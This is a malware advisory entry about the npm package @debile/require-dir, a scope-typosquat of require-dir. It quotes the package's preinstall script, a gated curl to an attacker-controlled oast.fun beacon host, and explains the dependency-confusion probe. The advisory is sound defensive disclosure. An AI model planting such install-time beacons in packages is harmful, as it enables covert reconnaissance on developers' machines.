MAL-2026-10654
Malicious code in @debile/require-dir (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3075732c05c8b941b57fed9e8fe9c788b28f9ff6fe9ef91936d1802f568c594e) Package @debile/require-dir republishes the code of the well-known require-dir package under a different scope. Its package.json preinstall script runs `bash -c 'if [[ 1 == 2 ]]; then curl https://xgtktsypnmotaeqmgvdmsn0l1hg0yewow.oast.fun; fi'`, which stages an Interactsh (oast.fun) out-of-band beacon in the install lifecycle. The curl is gated behind an always-false `[[ 1 == 2 ]]` guard, so no request is actually issued on install of this version, but the preinstall hook, the attacker-controlled OAST subdomain, and the scope-typosquat of a popular package (require-dir) together form a dependency-confusion / install-time recon probe. Flipping a single character in the guard converts the current release into a live install-time beacon to an attacker-controlled interaction server.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for @debile/require-dir (npm). Pin to a known-safe version or switch to an alternative.